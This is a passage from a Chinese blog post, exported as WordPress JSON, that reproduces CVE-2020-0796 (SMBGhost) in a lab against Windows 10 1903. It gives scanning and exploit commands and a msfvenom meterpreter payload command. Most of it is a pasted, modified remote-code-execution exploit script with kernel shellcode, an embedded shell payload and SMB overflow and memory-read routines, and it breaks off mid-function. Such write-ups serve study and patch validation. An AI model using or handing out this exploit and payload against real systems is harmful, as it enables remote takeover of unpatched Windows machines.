{"id":309,"date":"2023-07-22T16:45:58","date_gmt":"2023-07-22T08:45:58","guid":{"rendered":"https:\/\/www.zjydiary.top\/?p=309"},"modified":"2024-03-30T16:25:21","modified_gmt":"2024-03-30T08:25:21","slug":"cve-2020-0796%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0","status":"publish","type":"post","link":"https:\/\/www.zjydiary.top\/?p=309","title":{"rendered":"CVE-2020-0796\u6f0f\u6d1e\u590d\u73b0"},"content":{"rendered":"\n

\u7b2c1\u7ae0\u3001\u51c6\u5907\u5de5\u4f5c<\/h2>\n\n\n\n

1\u3001\u4e86\u89e3\u8be5\u6f0f\u6d1e\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf<\/h3>\n\n\n\n

Windows Server, version 1909 (Server Core installation)<\/p>\n\n\n\n

Windows 10 Version 1909 for ARM64-based Systems<\/p>\n\n\n\n

Windows 10 Version 1909 for x64-based Systems<\/p>\n\n\n\n

Windows 10 Version 1909 for 32-bit Systems<\/p>\n\n\n\n

Windows Server, version 1903 (Server Core installation)<\/p>\n\n\n\n

Windows 10 Version 1903 for ARM64-based Systems<\/p>\n\n\n\n

Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for 32-bit Systems<\/p>\n\n\n\n

2\u3001\u5b89\u88c5\u76ee\u6807\u673a\u5668\u865a\u62df\u73af\u5883\u53ca\u653b\u51fb\u673a\u5668\uff0c\u5e76\u4e92\u76f8ping\u901a<\/h3>\n\n\n\n

\u653b\u51fb\u673a\u5668\uff1aKali Linux 2023.1<\/p>\n\n\n\n

\u76ee\u6807\u673a\u5668\uff1aWindows 10 \u4e13\u4e1a\u7248 1903<\/p>\n\n\n\n

3\u3001\u51c6\u5907\u653b\u51fb\u7a0b\u5e8f\uff08POC\uff09\u3001Metasploit\u3001Python3<\/h3>\n\n\n\n

\u68c0\u6d4b\u6f0f\u6d1e\u662f\u5426\u5b58\u5728\u5de5\u5177\uff1ahttps:\/\/github.com\/ollypwn\/SMBGhost<\/a>\u6ce8[1]<\/sup><\/p>\n\n\n\n

\u84dd\u5c4f\u7206\u7834\u53ca\u653b\u51fb\u7a0b\u5e8f\uff1ahttps:\/\/github.com\/chompie1337\/SMBGhost_RCE_PoC<\/a>\u6ce8[2]<\/sup><\/p>\n\n\n\n

4\u3001\u5b9e\u9a8c\u524d\u63d0\uff1a\u76ee\u6807\u673a\u5668\u5173\u95ed\u9632\u706b\u5899<\/h3>\n\n\n\n

\u7b2c2\u7ae0\u3001\u68c0\u6d4b\u6f0f\u6d1e<\/h2>\n\n\n\n

1\u3001\u626b\u63cf\u76ee\u6807\u673a\u5668\u60c5\u51b5\uff0c\u4f7f\u7528nmap\uff08\u4e0a\u5e1d\u4e4b\u773c\uff09\u5de5\u5177<\/h3>\n\n\n\n
nmap 192.168.110.131<\/code><\/pre>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u56fe2 445\u7aef\u53e3\u6253\u5f00<\/p>\n\n\n\n
2\u3001\u68c0\u6d4b\u76ee\u6807\u673a\u5668\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff0c\u4f7f\u7528[1]\u4e2d\u7684\u7a0b\u5e8f<\/h3>\n\n\n\n
python3 scanner.py 192.168.110.131<\/code><\/pre>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u56fe3 \u663e\u793aVulnerable\u8868\u793a\u6709\u6f0f\u6d1e\uff0c\u663e\u793aNot Vulnerable\u8868\u793a\u65e0\u6f0f\u6d1e<\/p>\n\n\n\n
\u7b2c3\u7ae0\u3001\u8fdb\u884c\u84dd\u5c4f\u7206\u7834\uff0c\u4f7f\u7528[2]<\/sup>\u4e2d\u7684\u7a0b\u5e8f<\/h2>\n\n\n\n
python3 exploit.py -ip 192.168.110.131 -p 445<\/code><\/pre>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u56fe4.1 \u8f93\u5165\u76ee\u6807\u673aIP\u5f00\u59cb\u7206\u7834<\/p>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u56fe4.2 \u76ee\u6807\u673a\u5668\u84dd\u5c4f\u6ce8[3]\u5982\u679c\u5931\u8d25\u53ef\u4ee5\u591a\u8bd5\u51e0\u6b21<\/sup><\/p>\n\n\n\n
\u7b2c4\u7ae0\u3001\u83b7\u53d6shell\u653b\u51fb\uff0c\u5e76\u8fdb\u884c\u540e\u6e17\u900f<\/h2>\n\n\n\n
1\u3001\u4f7f\u7528Metasploit\u751f\u6210Payload\u5e76\u628aexploit.py\u6587\u4ef6\u91cc\u9762USER_PAYLOAD\u7684\u503c\u66ff\u6362\u4e3abuf\u503c\u3002<\/h3>\n\n\n\n
msfvenom -p winows\/x64\/meterpreter\/bind_tcp LPORT=8888 -b \u2019\\x00\u2019 -i 1 -f python<\/code><\/pre>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
\u56fe5 \u4ea7\u751f\u7684\u503c<\/p>\n\n\n\n
\u8fd9\u91cc\u8d34\u51fa\u6539\u597d\u7684\u6587\u4ef6<\/h4>\n\n\n\n
#!\/usr\/bin\/env python\r\n\r\nimport sys\r\nimport socket\r\nimport struct\r\nimport argparse\r\n\r\nfrom lznt1 import compress, compress_evil\r\nfrom smb_win import smb_negotiate, smb_compress\r\n\r\n# Use lowstub jmp bytes to signature search\r\nLOWSTUB_JMP = 0x1000600E9\r\n# Offset of PML4 pointer in lowstub\r\nPML4_LOWSTUB_OFFSET = 0xA0\r\n# Offset of lowstub virtual address in lowstub\r\nSELFVA_LOWSTUB_OFFSET = 0x78\r\n\r\n# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController\r\nHALP_APIC_REQ_INTERRUPT_OFFSET = 0x78\r\n\r\nKUSER_SHARED_DATA = 0xFFFFF78000000000\r\n\r\n# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR\r\nPNET_RAW_BUFF_OFFSET = 0x18\r\n# Offset of pMDL1 in SRVNET_BUFFER_HDR\r\nPMDL1_OFFSET = 0x38\r\n\r\n# Shellcode from kernel_shellcode.asm\r\nKERNEL_SHELLCODE = b\"\\x41\\x50\\x41\\x51\\x41\\x55\\x41\\x57\\x41\\x56\\x51\\x52\\x53\\x56\\x57\\x4C\"\r\nKERNEL_SHELLCODE += b\"\\x8D\\x35\\xB5\\x02\\x00\\x00\\x49\\x8B\\x86\\xD8\\x00\\x00\\x00\\x49\\x8B\\x9E\"\r\nKERNEL_SHELLCODE += b\"\\xE0\\x00\\x00\\x00\\x48\\x89\\x18\\xFB\\x48\\x31\\xC9\\x44\\x0F\\x22\\xC1\\xB9\"\r\nKERNEL_SHELLCODE += b\"\\x82\\x00\\x00\\xC0\\x0F\\x32\\x25\\x00\\xF0\\xFF\\xFF\\x48\\xC1\\xE2\\x20\\x48\"\r\nKERNEL_SHELLCODE += b\"\\x01\\xD0\\x48\\x2D\\x00\\x10\\x00\\x00\\x66\\x81\\x38\\x4D\\x5A\\x75\\xF3\\x49\"\r\nKERNEL_SHELLCODE += b\"\\x89\\xC7\\x4D\\x89\\x3E\\xBF\\x78\\x7C\\xF4\\xDB\\xE8\\xE4\\x00\\x00\\x00\\x49\"\r\nKERNEL_SHELLCODE += b\"\\x89\\xC5\\xBF\\x3F\\x5F\\x64\\x77\\xE8\\x38\\x01\\x00\\x00\\x48\\x89\\xC1\\xBF\"\r\nKERNEL_SHELLCODE += b\"\\xE1\\x14\\x01\\x17\\xE8\\x2B\\x01\\x00\\x00\\x48\\x89\\xC2\\x48\\x83\\xC2\\x08\"\r\nKERNEL_SHELLCODE += b\"\\x49\\x8D\\x74\\x0D\\x00\\xE8\\x09\\x01\\x00\\x00\\x3D\\xD8\\x83\\xE0\\x3E\\x74\"\r\nKERNEL_SHELLCODE += b\"\\x0A\\x4D\\x8B\\x6C\\x15\\x00\\x49\\x29\\xD5\\xEB\\xE5\\xBF\\x48\\xB8\\x18\\xB8\"\r\nKERNEL_SHELLCODE += b\"\\x4C\\x89\\xE9\\xE8\\x9B\\x00\\x00\\x00\\x49\\x89\\x46\\x08\\x4D\\x8B\\x45\\x30\"\r\nKERNEL_SHELLCODE += b\"\\x4D\\x8B\\x4D\\x38\\x49\\x81\\xE8\\xF8\\x02\\x00\\x00\\x48\\x31\\xF6\\x49\\x81\"\r\nKERNEL_SHELLCODE += b\"\\xE9\\xF8\\x02\\x00\\x00\\x41\\x8B\\x79\\x74\\x0F\\xBA\\xE7\\x04\\x73\\x05\\x4C\"\r\nKERNEL_SHELLCODE += b\"\\x89\\xCE\\xEB\\x0C\\x4D\\x39\\xC8\\x4D\\x8B\\x89\\x00\\x03\\x00\\x00\\x75\\xDE\"\r\nKERNEL_SHELLCODE += b\"\\x48\\x85\\xF6\\x74\\x49\\x49\\x8D\\x4E\\x10\\x48\\x89\\xF2\\x4D\\x31\\xC0\\x4C\"\r\nKERNEL_SHELLCODE += b\"\\x8D\\x0D\\xC2\\x00\\x00\\x00\\x52\\x41\\x50\\x41\\x50\\x41\\x50\\xBF\\xC4\\x5C\"\r\nKERNEL_SHELLCODE += b\"\\x19\\x6D\\x48\\x83\\xEC\\x20\\xE8\\x38\\x00\\x00\\x00\\x48\\x83\\xC4\\x40\\x49\"\r\nKERNEL_SHELLCODE += b\"\\x8D\\x4E\\x10\\xBF\\x34\\x46\\xCC\\xAF\\x48\\x83\\xEC\\x20\\xB8\\x05\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x44\\x0F\\x22\\xC0\\xE8\\x19\\x00\\x00\\x00\\x48\\x83\\xC4\\x20\\xFA\\x48\"\r\nKERNEL_SHELLCODE += b\"\\x89\\xD8\\x5F\\x5E\\x5B\\x5A\\x59\\x41\\x5E\\x41\\x5F\\x41\\x5D\\x41\\x59\\x41\"\r\nKERNEL_SHELLCODE += b\"\\x58\\xFF\\xE0\\xE8\\x02\\x00\\x00\\x00\\xFF\\xE0\\x53\\x51\\x56\\x41\\x8B\\x47\"\r\nKERNEL_SHELLCODE += b\"\\x3C\\x4C\\x01\\xF8\\x8B\\x80\\x88\\x00\\x00\\x00\\x4C\\x01\\xF8\\x50\\x8B\\x48\"\r\nKERNEL_SHELLCODE += b\"\\x18\\x8B\\x58\\x20\\x4C\\x01\\xFB\\xFF\\xC9\\x8B\\x34\\x8B\\x4C\\x01\\xFE\\xE8\"\r\nKERNEL_SHELLCODE += b\"\\x1F\\x00\\x00\\x00\\x39\\xF8\\x75\\xEF\\x58\\x8B\\x58\\x24\\x4C\\x01\\xFB\\x66\"\r\nKERNEL_SHELLCODE += b\"\\x8B\\x0C\\x4B\\x8B\\x58\\x1C\\x4C\\x01\\xFB\\x8B\\x04\\x8B\\x4C\\x01\\xF8\\x5E\"\r\nKERNEL_SHELLCODE += b\"\\x59\\x5B\\xC3\\x52\\x31\\xC0\\x99\\xAC\\xC1\\xCA\\x0D\\x01\\xC2\\x85\\xC0\\x75\"\r\nKERNEL_SHELLCODE += b\"\\xF6\\x92\\x5A\\xC3\\xE8\\xA1\\xFF\\xFF\\xFF\\x80\\x78\\x02\\x80\\x77\\x05\\x0F\"\r\nKERNEL_SHELLCODE += b\"\\xB6\\x40\\x03\\xC3\\x8B\\x40\\x03\\xC3\\x41\\x57\\x41\\x56\\x57\\x56\\x48\\x8B\"\r\nKERNEL_SHELLCODE += b\"\\x05\\x0E\\x01\\x00\\x00\\x48\\x8B\\x48\\x18\\x48\\x8B\\x49\\x20\\x48\\x8B\\x09\"\r\nKERNEL_SHELLCODE += b\"\\x66\\x83\\x79\\x48\\x18\\x75\\xF6\\x48\\x8B\\x41\\x50\\x81\\x78\\x0C\\x33\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x32\\x00\\x75\\xE9\\x4C\\x8B\\x79\\x20\\xBF\\x5E\\x51\\x5E\\x83\\xE8\\x58\\xFF\"\r\nKERNEL_SHELLCODE += b\"\\xFF\\xFF\\x49\\x89\\xC6\\x4C\\x8B\\x3D\\xCF\\x00\\x00\\x00\\x31\\xC0\\x48\\x8D\"\r\nKERNEL_SHELLCODE += b\"\\x15\\x96\\x01\\x00\\x00\\x89\\xC1\\x48\\xF7\\xD1\\x49\\x89\\xC0\\xB0\\x40\\x50\"\r\nKERNEL_SHELLCODE += b\"\\xC1\\xE0\\x06\\x50\\x49\\x89\\x01\\x48\\x83\\xEC\\x20\\xBF\\xEA\\x99\\x6E\\x57\"\r\nKERNEL_SHELLCODE += b\"\\xE8\\x1E\\xFF\\xFF\\xFF\\x48\\x83\\xC4\\x30\\x48\\x8B\\x3D\\x6B\\x01\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x48\\x8D\\x35\\x77\\x00\\x00\\x00\\xB9\\x1D\\x00\\x00\\x00\\xF3\\xA4\\x48\\x8D\"\r\nKERNEL_SHELLCODE += b\"\\x35\\x6E\\x01\\x00\\x00\\xB9\\x58\\x02\\x00\\x00\\xF3\\xA4\\x48\\x8D\\x0D\\xE0\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x00\\x00\\x65\\x48\\x8B\\x14\\x25\\x88\\x01\\x00\\x00\\x4D\\x31\\xC0\\x4C\"\r\nKERNEL_SHELLCODE += b\"\\x8D\\x0D\\x46\\x00\\x00\\x00\\x41\\x50\\x6A\\x01\\x48\\x8B\\x05\\x2A\\x01\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x50\\x41\\x50\\x48\\x83\\xEC\\x20\\xBF\\xC4\\x5C\\x19\\x6D\\xE8\\xC1\\xFE\"\r\nKERNEL_SHELLCODE += b\"\\xFF\\xFF\\x48\\x83\\xC4\\x40\\x48\\x8D\\x0D\\xA6\\x00\\x00\\x00\\x4C\\x89\\xF2\"\r\nKERNEL_SHELLCODE += b\"\\x4D\\x31\\xC9\\xBF\\x34\\x46\\xCC\\xAF\\x48\\x83\\xEC\\x20\\xE8\\xA2\\xFE\\xFF\"\r\nKERNEL_SHELLCODE += b\"\\xFF\\x48\\x83\\xC4\\x20\\x5E\\x5F\\x41\\x5E\\x41\\x5F\\xC3\\x90\\xC3\\x48\\x92\"\r\nKERNEL_SHELLCODE += b\"\\x31\\xC9\\x51\\x51\\x49\\x89\\xC9\\x4C\\x8D\\x05\\x0D\\x00\\x00\\x00\\x89\\xCA\"\r\nKERNEL_SHELLCODE += b\"\\x48\\x83\\xEC\\x20\\xFF\\xD0\\x48\\x83\\xC4\\x30\\xC3\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x00\\x00\\x00\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x00\\x00\"\r\n\r\n# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?\r\n\r\nUSER_PAYLOAD =  b\"\"\r\nUSER_PAYLOAD += b\"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xc1\\xff\\xff\\xff\\x48\\x8d\"\r\nUSER_PAYLOAD += b\"\\x05\\xef\\xff\\xff\\xff\\x48\\xbb\\x27\\x2c\\x8d\\x13\\x99\"\r\nUSER_PAYLOAD += b\"\\xb7\\x3d\\xf5\\x48\\x31\\x58\\x27\\x48\\x2d\\xf8\\xff\\xff\"\r\nUSER_PAYLOAD += b\"\\xff\\xe2\\xf4\\xdb\\x64\\x0c\\xf7\\x69\\x48\\xc2\\x0a\\xcf\"\r\nUSER_PAYLOAD += b\"\\xe0\\x8d\\x13\\x99\\xf6\\x6c\\xb4\\x77\\x7e\\xdc\\x45\\xd1\"\r\nUSER_PAYLOAD += b\"\\x86\\xef\\x90\\x6f\\xa7\\xdf\\x73\\xd1\\x3c\\x6f\\xed\\x6f\"\r\nUSER_PAYLOAD += b\"\\xa7\\xdf\\x33\\xd4\\x86\\xf4\\xbd\\x28\\x9b\\xc7\\x59\\xd1\"\r\nUSER_PAYLOAD += b\"\\x3c\\x4f\\xa5\\x6f\\x1d\\x4d\\xbf\\xa5\\xd6\\x41\\xf7\\x0b\"\r\nUSER_PAYLOAD += b\"\\x0c\\xcc\\xd2\\x50\\xba\\x7c\\xf4\\xe6\\xce\\x60\\x41\\xd1\"\r\nUSER_PAYLOAD += b\"\\x3c\\x6f\\xd5\\x66\\x7d\\x06\\x51\\xa5\\xff\\x3c\\x25\\x41\"\r\nUSER_PAYLOAD += b\"\\xad\\xf5\\x0b\\x92\\xb5\\x32\\x70\\x55\\x2c\\x8d\\x13\\x12\"\r\nUSER_PAYLOAD += b\"\\x37\\xb5\\xf5\\x27\\x2c\\xc5\\x96\\x59\\xc3\\x5a\\xbd\\x26\"\r\nUSER_PAYLOAD += b\"\\xfc\\xdd\\x98\\xd1\\xaf\\x79\\x7e\\x67\\x0c\\xc4\\x12\\x49\"\r\nUSER_PAYLOAD += b\"\\x54\\x6b\\xb8\\x16\\xe5\\xc5\\xec\\x50\\xf6\\xb6\\xc1\\xaf\"\r\nUSER_PAYLOAD += b\"\\x64\\x8c\\xc5\\xd1\\x86\\xfd\\x59\\x66\\xed\\x44\\x1e\\xd8\"\r\nUSER_PAYLOAD += b\"\\xb6\\xfc\\xcd\\xc7\\x59\\x7c\\x5f\\x9a\\xfb\\x19\\xfd\\x62\"\r\nUSER_PAYLOAD += b\"\\x15\\x5c\\x66\\x41\\xef\\x79\\x7e\\x67\\x08\\xc4\\x12\\x49\"\r\nUSER_PAYLOAD += b\"\\xd1\\x7c\\x7e\\x2b\\x64\\xc9\\x98\\xd9\\xab\\x74\\xf4\\xf7\"\r\nUSER_PAYLOAD += b\"\\x6d\\x06\\x17\\x11\\xf6\\x65\\xbd\\x26\\xfc\\xcc\\x4b\\xc7\"\r\nUSER_PAYLOAD += b\"\\xee\\x67\\xb4\\x7f\\x6d\\xd4\\x52\\xc3\\xff\\xbe\\x19\\x07\"\r\nUSER_PAYLOAD += b\"\\x6d\\xdf\\xec\\x79\\xef\\x7c\\xac\\x7d\\x64\\x06\\x01\\x70\"\r\nUSER_PAYLOAD += b\"\\xfc\\xc2\\x0a\\xd8\\x71\\xc4\\xad\\xee\\xc4\\x0f\\xaa\\x14\"\r\nUSER_PAYLOAD += b\"\\x1e\\x8d\\x13\\xd8\\xe1\\x74\\x7c\\xc1\\x64\\x0c\\xff\\x39\"\r\nUSER_PAYLOAD += b\"\\xb6\\x3d\\xf5\\x6e\\xa5\\x68\\x5b\\xa8\\x77\\x6d\\xa5\\x6e\"\r\nUSER_PAYLOAD += b\"\\x90\\x8f\\x13\\xbb\\x0f\\x3d\\xf5\\x27\\x2c\\xcc\\x47\\xd0\"\r\nUSER_PAYLOAD += b\"\\x3e\\xd9\\xb9\\xae\\xdd\\xcc\\xa9\\xd5\\xc0\\x1b\\xf2\\xd8\"\r\nUSER_PAYLOAD += b\"\\xf9\\xc1\\x9a\\x73\\xdf\\x3c\\xf4\\x27\\x2c\\xd4\\x52\\x23\"\r\nUSER_PAYLOAD += b\"\\x9e\\xbd\\x9e\\x27\\xd3\\x58\\x79\\x9b\\xee\\x6d\\xa5\\x6a\"\r\nUSER_PAYLOAD += b\"\\x1d\\x44\\x5e\\xa8\\x77\\x75\\x0a\\xe7\\x64\\x04\\xd1\\xd8\"\r\nUSER_PAYLOAD += b\"\\x0d\\xd7\\xfa\\xf8\\xcc\\x72\\xc6\\xd1\\x3e\\xfa\\x9f\\x37\"\r\nUSER_PAYLOAD += b\"\\x6d\\xd5\\x5f\\x10\\x55\\x75\\x7c\\xde\\x6d\\x37\\xd1\\x42\"\r\nUSER_PAYLOAD += b\"\\x80\\x5a\\x0a\\xf2\\x64\\xbc\\xc1\\xd1\\x3e\\xc4\\xb4\\x9d\"\r\nUSER_PAYLOAD += b\"\\x9b\\x64\\x2b\\x66\\x48\\xe8\\xb8\\x16\\xec\\xc5\\x22\\x4b\"\r\nUSER_PAYLOAD += b\"\\xff\\xb4\\x0c\\x66\\x96\\xf9\\xff\\xa2\\x56\\xc2\\x20\\x6f\"\r\nUSER_PAYLOAD += b\"\\xa5\\x74\\x5b\\x10\\x70\\x7c\\x4f\\x52\\x42\\xc0\\x72\\x66\"\r\nUSER_PAYLOAD += b\"\\x62\\x75\\x74\\xe3\\x9c\\x8f\\x13\\x99\\xff\\xbe\\x19\\x37\"\r\nUSER_PAYLOAD += b\"\\x64\\x04\\xf1\\xd4\\x86\\xf4\\x9f\\x23\\x6d\\xd5\\x5b\\x10\"\r\nUSER_PAYLOAD += b\"\\x4e\\x7c\\x4f\\x25\\xf5\\x45\\x4c\\x66\\x62\\x75\\x76\\xe3\"\r\nUSER_PAYLOAD += b\"\\x0c\\xd3\\x9a\\x6f\\xdd\\x7d\\xb4\\x7e\\x44\\x8d\\x03\\x99\"\r\nUSER_PAYLOAD += b\"\\xb7\\x7c\\xad\\x6f\\xa5\\x7f\\x5b\\xa8\\x7e\\x7c\\x4f\\x7f\"\r\nUSER_PAYLOAD += b\"\\x88\\xde\\xf6\\x66\\x62\\x75\\x7c\\xe4\\x65\\x04\\xd4\\xd4\"\r\nUSER_PAYLOAD += b\"\\x86\\xf4\\xbc\\xae\\xdc\\xc5\\x9a\\x43\\xff\\xb4\\x0c\\x66\"\r\nUSER_PAYLOAD += b\"\\x96\\x8f\\xca\\x51\\xe8\\xc2\\x20\\x6f\\x2d\\x4e\\x5b\\xb0\"\r\nUSER_PAYLOAD += b\"\\x71\\x75\\x70\\xd1\\x59\\x6c\\x52\\x66\\x50\\x65\\x9f\\x27\"\r\nUSER_PAYLOAD += b\"\\x75\\xc4\\xd4\\x5b\\x47\\x88\\x57\\x71\\xd3\\x58\\x13\\x99\"\r\nUSER_PAYLOAD += b\"\\xb7\\x3d\\xf5\"\r\n\r\n\r\nPML4_SELFREF = 0\r\nPHAL_HEAP = 0\r\nPHALP_INTERRUPT = 0\r\nPHALP_APIC_INTERRUPT = 0\r\nPNT_ENTRY = 0\r\n\r\nmax_read_retry = 3\r\noverflow_val = 0x1100\r\nwrite_unit = 0xd0\r\npmdl_va = KUSER_SHARED_DATA + 0x900\r\npmdl_mapva = KUSER_SHARED_DATA + 0x800\r\npshellcodeva = KUSER_SHARED_DATA + 0x950\r\n\r\n\r\nclass MDL:\r\n    def __init__(self, map_va, phys_addr):\r\n        self.next = struct.pack(\"<Q\", 0x0)\r\n        self.size = struct.pack(\"<H\", 0x48)\r\n        self.mdl_flags = struct.pack(\"<H\", 0x5018)\r\n        self.alloc_processor = struct.pack(\"<H\", 0x0)\r\n        self.reserved = struct.pack(\"<H\", 0x0)\r\n        self.process = struct.pack(\"<Q\", 0x0)\r\n        self.map_va = struct.pack(\"<Q\", map_va)\r\n        map_va &= ~0xFFF\r\n        self.start_va = struct.pack(\"<Q\", map_va)\r\n        self.byte_count = struct.pack(\"<L\", 0x258)\r\n        self.byte_offset = struct.pack(\"<L\", (phys_addr & 0xFFF) + 0x4)\r\n        phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12\r\n        self.phys_addr1 = struct.pack(\"<Q\", phys_addr_enc)\r\n        self.phys_addr2 = struct.pack(\"<Q\", phys_addr_enc)\r\n        self.phys_addr3 = struct.pack(\"<Q\", phys_addr_enc)\r\n\r\n    def raw_bytes(self):\r\n        mdl_bytes = self.next + self.size + self.mdl_flags + \\\r\n                    self.alloc_processor + self.reserved + self.process + \\\r\n                    self.map_va + self.start_va + self.byte_count + \\\r\n                    self.byte_offset + self.phys_addr1 + self.phys_addr2 + \\\r\n                    self.phys_addr3\r\n        return mdl_bytes\r\n\r\n\r\ndef reconnect(ip, port):\r\n    sock = socket.socket(socket.AF_INET)\r\n    sock.settimeout(7)\r\n    sock.connect((ip, port))\r\n    return sock\r\n\r\n\r\ndef write_primitive(ip, port, data, addr):\r\n    sock = reconnect(ip, port)\r\n    smb_negotiate(sock)\r\n    sock.recv(1000)\r\n    uncompressed_data = b\"\\x41\"*(overflow_val - len(data))\r\n    uncompressed_data += b\"\\x00\"*PNET_RAW_BUFF_OFFSET\r\n    uncompressed_data += struct.pack('<Q', addr)\r\n    compressed_data = compress(uncompressed_data)\r\n    smb_compress(sock, compressed_data, 0xFFFFFFFF, data)\r\n    sock.close()\r\n\r\n\r\ndef write_srvnet_buffer_hdr(ip, port, data, offset):\r\n    sock = reconnect(ip, port)\r\n    smb_negotiate(sock)\r\n    sock.recv(1000)\r\n    compressed_data = compress_evil(data)\r\n    dummy_data = b\"\\x33\"*(overflow_val + offset)\r\n    smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)\r\n    sock.close()\r\n\r\n\r\ndef read_physmem_primitive(ip, port, phys_addr):\r\n    i = 0\r\n    while i < max_read_retry:\r\n        i += 1\r\n        buff = try_read_physmem_primitive(ip, port, phys_addr)\r\n        if buff is not None:\r\n            return buff\r\n\r\n\r\ndef try_read_physmem_primitive(ip, port, phys_addr):\r\n    fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()\r\n    write_primitive(ip, port, fake_mdl, pmdl_va)\r\n    write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)\r\n\r\n    i = 0\r\n    while i < max_read_retry:\r\n        i += 1\r\n        sock = reconnect(ip, port)\r\n        smb_negotiate(sock)\r\n        buff = sock.recv(1000)\r\n        sock.close()\r\n        if buff[4:8] != b\"\\xfeSMB\":\r\n            return buff\r\n\r\n\r\ndef get_phys_addr(ip, port, va_addr):\r\n    pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))\r\n    pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))\r\n    pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))\r\n    pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))\r\n\r\n    pml4e = PML4 + pml4_index*0x8\r\n    pdpt_buff = read_physmem_primitive(ip, port, pml4e)\r\n\r\n    if pdpt_buff is None:\r\n        sys.exit(\"[-] physical read primitive failed\")\r\n\r\n    pdpt = struct.unpack(\"<Q\", pdpt_buff[0:8])[0] & 0xFFFFF000\r\n    pdpte = pdpt + pdpt_index*0x8\r\n    pdt_buff = read_physmem_primitive(ip, port, pdpte)\r\n\r\n    if pdt_buff is None:\r\n        sys.exit(\"[-] physical read primitive failed\")\r\n\r\n    pdt = struct.unpack(\"<Q\", pdt_buff[0:8])[0] & 0xFFFFF000\r\n    pdte = pdt + pdt_index*0x8\r\n    pt_buff = read_physmem_primitive(ip, port, pdte)\r\n\r\n    if pt_buff is None:\r\n        sys.exit(\"[-] physical read primitive failed\")\r\n\r\n    pt = struct.unpack(\"<Q\", pt_buff[0:8])[0]\r\n    \r\n    if pt & (1 << (8 - 1)):\r\n        phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)\r\n        return phys_addr\r\n    else:\r\n        pt = pt & 0xFFFFF000\r\n\r\n    pte = pt + pt_index*0x8\r\n    pte_buff = read_physmem_primitive(ip, port, pte)\r\n\r\n    if pte_buff is None:\r\n        sys.exit(\"[-] physical read primitive failed\")\r\n\r\n    phys_addr = (struct.unpack(\"<Q\", pte_buff[0:8])[0] & 0xFFFFF000) + \\\r\n                (va_addr & 0xFFF)\r\n\r\n    return phys_addr\r\n\r\n\r\ndef get_pte_va(addr):\r\n    pt = addr >> 9\r\n    lb = (0xFFFF << 48) | (PML4_SELFREF << 39)\r\n    ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +\r\n          0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8\r\n    pt = pt | lb\r\n    pt = pt & ub\r\n\r\n    return pt\r\n\r\n\r\ndef overwrite_pte(ip, port, addr):\r\n    phys_addr = 